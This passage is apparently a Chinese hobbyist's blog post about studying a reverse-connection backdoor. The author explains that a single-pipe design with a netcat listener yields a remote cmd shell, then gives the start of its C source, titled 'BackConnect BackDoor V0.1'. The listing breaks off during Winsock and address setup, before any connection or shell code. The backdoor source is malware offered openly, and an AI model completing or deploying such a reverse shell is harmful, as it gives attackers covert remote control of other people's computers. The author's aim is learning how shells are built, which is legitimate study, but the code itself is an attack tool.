这是一个反向连接的源程序 通过对这个程序的研究我可以知道一个cmd shell是怎么建立并实现的
这是一个单管道的程序 为此我还专门看了一下书中所讲的零管道和双管道
用瑞士军刀进行监听 最后得到一个cmd shell
是不是溢出攻击也是要用到这个哟 嘿嘿 幻想...
#include<winsock2.h>
#include<stdio.h>
#pragma comment(lib,"ws2_32.lib")
void main(int argc,char **argv)
{
char *messages = "/r/n======================== BackConnect BackDoor V0.1 ========================/r/n========= Welcome to Http://www.nohack.cn =========/r/n";
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
char buf1[1024]; //作为socket接收数据的缓冲区
memset(buf1,0,1024); //清空缓冲区
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:d/n",WSAGetLastError());
return;
}
addr_in.sin_family=AF_INET;
addr_i